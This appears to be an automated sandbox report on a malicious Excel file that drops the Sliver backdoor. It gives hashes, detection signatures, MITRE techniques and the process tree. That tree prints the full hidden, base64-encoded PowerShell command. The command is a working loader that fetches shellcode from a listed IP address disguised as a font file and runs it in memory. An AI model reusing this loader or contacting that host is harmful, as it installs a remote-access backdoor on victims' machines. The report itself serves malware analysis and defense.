sliver | e40c0ebaa593bf2cf9d1339257c4182ca38bfe956397f5619833c5fd1aa9c74a

General

Target

e40c0ebaa593bf2cf9d1339257c4182ca38bfe956397f5619833c5fd1aa9c74a.xls
Size

46KB
MD5

81ce0368b95d9708a178d3c1534253a6
SHA1

6e66b8bb82bd567a78f97815e7847f1d3c1de180
SHA256

e40c0ebaa593bf2cf9d1339257c4182ca38bfe956397f5619833c5fd1aa9c74a
SHA512

6b99ced3318b4c74933bb8ba5ea4c7b91a7ee5348909ffc2dc41d7d25e0b2a488fdf21c0284a405ee80925109352e0dbc336fed6054f5f10fa85eaf234f4c68e
SSDEEP

768:t4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:6SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1700	4840	powershell.exe	82

Sliver RAT v2 6 IoCs

resource	yara_rule
behavioral2/memory/1700-58-0x000001C371F50000-0x000001C3729CE000-memory.dmp	SliverRAT_v2
behavioral2/memory/1700-59-0x000001C373450000-0x000001C373F36000-memory.dmp	SliverRAT_v2
behavioral2/memory/1700-61-0x000001C373450000-0x000001C373F36000-memory.dmp	SliverRAT_v2
behavioral2/memory/1700-60-0x000001C373450000-0x000001C373F36000-memory.dmp	SliverRAT_v2
behavioral2/memory/1700-62-0x000001C373450000-0x000001C373F36000-memory.dmp	SliverRAT_v2
behavioral2/memory/1700-68-0x000001C373450000-0x000001C373F36000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 20 IoCs

flow	pid	Process
22	1700	powershell.exe
24	1700	powershell.exe
28	1700	powershell.exe
34	1700	powershell.exe
35	1700	powershell.exe
36	1700	powershell.exe
37	1700	powershell.exe
38	1700	powershell.exe
39	1700	powershell.exe
40	1700	powershell.exe
41	1700	powershell.exe
44	1700	powershell.exe
52	1700	powershell.exe
57	1700	powershell.exe
58	1700	powershell.exe
59	1700	powershell.exe
60	1700	powershell.exe
61	1700	powershell.exe
62	1700	powershell.exe
63	1700	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1700	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4840	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1700	powershell.exe
1700	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1700	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
4840	EXCEL.EXE
4840	EXCEL.EXE

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE
4840	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 4840 wrote to memory of 1700	4840	EXCEL.EXE	86
PID 4840 wrote to memory of 1700	4840	EXCEL.EXE	86
PID 1700 wrote to memory of 1040	1700	powershell.exe	89
PID 1700 wrote to memory of 1040	1700	powershell.exe	89
PID 1040 wrote to memory of 3416	1040	csc.exe	90
PID 1040 wrote to memory of 3416	1040	csc.exe	90

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e40c0ebaa593bf2cf9d1339257c4182ca38bfe956397f5619833c5fd1aa9c74a.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1700
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ooyt4jro\ooyt4jro.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1040
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B84.tmp" "c:\Users\Admin\AppData\Local\Temp\ooyt4jro\CSC49F5CF85958C4FB291DEE5DC9A4CF9AD.TMP"
      4⤵
      PID:3416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9B84.tmp

Filesize
1KB

MD5
0253bcac7487c862c8eb6dcc84ffed9b

SHA1
9f9359d3e3e12698e00f2520a4a604947b5889b5

SHA256
77e2558ea948355d7eae1af2902f603bc76acf1ebc32307e83021b7fcfe7f9f2

SHA512
d66d8a3e0f0b1b9a9460fb9010b52391cf6455eb1be3759ac4aa75c80f619c57ccd4ab765e496fbd41505db2d0dd67bb2183b59dd9858a03fc8e6ad11c6d15fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ciktxphi.fux.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ooyt4jro\ooyt4jro.dll

Filesize
3KB

MD5
7ba7d143fb88807a9f5d155168bfa8fe

SHA1
d762fba95d5b797e3ec4bce244f751fa99c32bdb

SHA256
995fa8ec08122721e4a1ffa206465af051809f85a8edc38327128daa5b249832

SHA512
9f5daff44a6dc328966b0b85bba7773043a2a41271ee56564ef3f70a4fd3f5ce2261d98179ba9621c476e6b05aaed0f422efe2300b1159aa3d51165f800d8987

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

Filesize
1KB

MD5
c61c0133e306efdee0bd8c47499d1493

SHA1
d642366577cabe176828d8d74f837e115010d4e0

SHA256
0f702d4229b9f4369c6782ba145889cc7ec12b9ef8018361d8d2b82dfaa9dd87

SHA512
0e6b038664ba04931a8fa0d9550fb0b647ba98f5e3954804c3cf3ac6ae7e9e03eedc2e6058f0edcdd4c4f3ddcdaa1cfb1de81c0d3e07252f3b8212c2d27767a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ooyt4jro\CSC49F5CF85958C4FB291DEE5DC9A4CF9AD.TMP

Filesize
652B

MD5
8317923c4f44f4f69bfa61722781b587

SHA1
2d3068282f0634591380e0ba27d05ce66e11e7a8

SHA256
82b230ec6846cc4c8d3b3d69a9a5fbbe39662b52355613cd95d012c3c4ce330a

SHA512
16b438a2b42dfccbab9bed7e5008be312b69f58d9a4df605cd5a6b6087a4fff9d7565ddfe1541cd8f33d8b95367a8f783396acd6d152f5dc3fd8421b2a13dce9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ooyt4jro\ooyt4jro.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ooyt4jro\ooyt4jro.cmdline

Filesize
369B

MD5
4453d0bc788b3dba5ab852925b2ed278

SHA1
77aa305ec8e04e40d14206acabca09888aad2e4e

SHA256
6440cdc839138c3b1d9c50b91878135caaf31216807838eb0f438e183012f369

SHA512
e8278220e149945fea1ada645db13c66c5e054a28a6b0ceff8fb06ca11b87752266e76a53ccfe815e3e3e0930ef2f5c1a435c4665b01b477595715277fda880e

Download Submit
memory/1700-58-0x000001C371F50000-0x000001C3729CE000-memory.dmp

Filesize
10.5MB

Download
memory/1700-27-0x000001C371630000-0x000001C371652000-memory.dmp

Filesize
136KB

Download
memory/1700-68-0x000001C373450000-0x000001C373F36000-memory.dmp

Filesize
10.9MB

Download
memory/1700-62-0x000001C373450000-0x000001C373F36000-memory.dmp

Filesize
10.9MB

Download
memory/1700-60-0x000001C373450000-0x000001C373F36000-memory.dmp

Filesize
10.9MB

Download
memory/1700-61-0x000001C373450000-0x000001C373F36000-memory.dmp

Filesize
10.9MB

Download
memory/1700-59-0x000001C373450000-0x000001C373F36000-memory.dmp

Filesize
10.9MB

Download
memory/1700-52-0x000001C371680000-0x000001C371688000-memory.dmp

Filesize
32KB

Download
memory/4840-22-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-57-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

Filesize
4KB

Download
memory/4840-11-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-12-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-9-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-5-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-2-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/4840-1-0x00007FFC6DE0D000-0x00007FFC6DE0E000-memory.dmp

Filesize
4KB

Download
memory/4840-4-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/4840-6-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/4840-56-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-21-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-0-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download
memory/4840-14-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

Filesize
64KB

Download
memory/4840-10-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-7-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-8-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-66-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-67-0x00007FFC6DD70000-0x00007FFC6DF65000-memory.dmp

Filesize
2.0MB

Download
memory/4840-13-0x00007FFC2BD00000-0x00007FFC2BD10000-memory.dmp

Filesize
64KB

Download
memory/4840-3-0x00007FFC2DDF0000-0x00007FFC2DE00000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads